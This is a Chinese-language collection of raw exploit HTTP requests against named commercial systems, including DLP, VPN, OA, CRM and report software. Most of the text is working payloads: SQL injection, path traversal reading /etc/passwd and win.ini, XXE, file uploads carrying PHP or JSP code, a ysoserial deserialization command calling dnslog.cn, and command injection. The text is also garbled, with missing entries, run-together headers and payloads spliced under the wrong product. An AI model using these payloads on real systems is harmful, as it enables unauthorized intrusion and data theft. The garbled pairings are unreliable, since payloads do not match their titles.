1.亿赛通数据泄露防护系统NetSecConfigAjax接口存在SQL注入漏洞
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 Host:Content-Type: application/x-www-form-urlencodedcommand=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--2.SuiteCRM responseEntryPoint存在SQL注入漏洞
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzipConnection: close3.启明星辰-天清汉马VPN接口download任意文件读取漏洞
GET /vpn/user/download/client?ostype=../../../../../../../etc/passwd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,**;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Priority: u=0, iConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 98command=delNotice¬iceId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0: 3'--6.蓝凌EKP存在sys_ui_component远程命令执行漏洞
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1Host: 127.0.0.1Accept:application/json,text/javascript,**;q=0.8Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 18.致远AnalyticsCloud分析云存在任意文件读取漏洞
GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflateAccept: **Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7Connection: close10.数字通指尖云平台-智慧政务OA PayslipUser SQL注入漏洞
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,**13.用友U8 Cloud MonitorServlet 存在反序列化漏洞
java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.serPOST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1 Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36payload14.云课网校系统uploadImage存在任意文件上传漏洞
POST /api/uploader/uploadImage HTTP/1.1Host: 127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip,deflate,brAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: no-cacheConnection: keep-aliveContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DInOLIXxe9mx-requested-with: XMLHttpRequest------WebKitFormBoundaryLZbmKeasWgo2gPtUContent-Disposition: form-data; name="file"; filename="1.php"Content-Type: image/gif<?php phpinfo();?>------WebKitFormBoundaryLZbmKeasWgo2gPtU--15.广联达Linkworks ArchiveWebService XML实体注入漏洞
POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1Host: Content-Type: text/xml; charset=utf-8Content-Length: lengthSOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo"<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <PostArchiveInfo xmlns="http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx"> <archiveInfo><!DOCTYPE Archive [
    <!ENTITY secret SYSTEM "file:///windows/win.ini">
]>

<Archive>  
    <ArchiveInfo>  
        <UploaderID>
############


&secret;


##############
</UploaderID>  
    </ArchiveInfo>  
    <Result>  
        <MainDoc>Document Content</MainDoc>  
    </Result>  
    <DocInfo>  
        <DocTypeID>1</DocTypeID>  
        <DocVersion>1.0</DocVersion>  
    </DocInfo>  
</Archive></archiveInfo> <folderIdList>string</folderIdList> <platId>string</platId> </PostArchiveInfo> </soap:Body></soap:Envelope>16.启明星辰 天玥网络安全审计系统 SQL 注入漏洞
POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Connection: closecheckname=123&tagid=123 AND 8475=(SELECT 8475 FROM PG_SLEEP(5))-- BAUh17.润乾报表前台任意文件上传漏洞
POST /InputServlet?action=12 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Content-Type: multipart/form-data; boundary=00content0boundary00Host: 127.0.0.1Accept: text/html, image/gif, image/jpeg, *; q=.2, **;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 119.指挥调度管理平台 ajax_users.php 信息泄露漏洞
/app/ext/ajax_users.php20.致远 OA fileUpload.do 前台文件上传绕过漏洞
1、上传图片马,返回 fileid 值POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1Host:Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Type: multipart/form-data; boundary=00content0boundary00 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)Content-Length: 754--00content0boundary00 Content-Disposition: form-data; name="type"--00content0boundary00Content-Disposition: form-data; name="extensions"png--00content0boundary00Content-Disposition: form-data; name="applicationCategory"--00content0boundary00Content-Disposition: form-data; name="destDirectory"--00content0boundary00Content-Disposition: form-data; name="destFilename"--00content0boundary00Content-Disposition: form-data; name="maxSize"--00content0boundary00Content-Disposition: form-data; name="isEncrypt"false--00content0boundary00Content-Disposition: form-data; name="file1"; filename="1.png" Content-Type: Content-Type: application/pdf<% out.println("hello");%> --00content0boundary00--2、修改文件后缀为 jspPOST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1 Host:Accept: text/html, image/gif, image/jpeg, *; q=.2, **;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/json;charset=UTF-8 {"type":"environment","operate":"","machines":{"id": "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/ccc.txt)"}}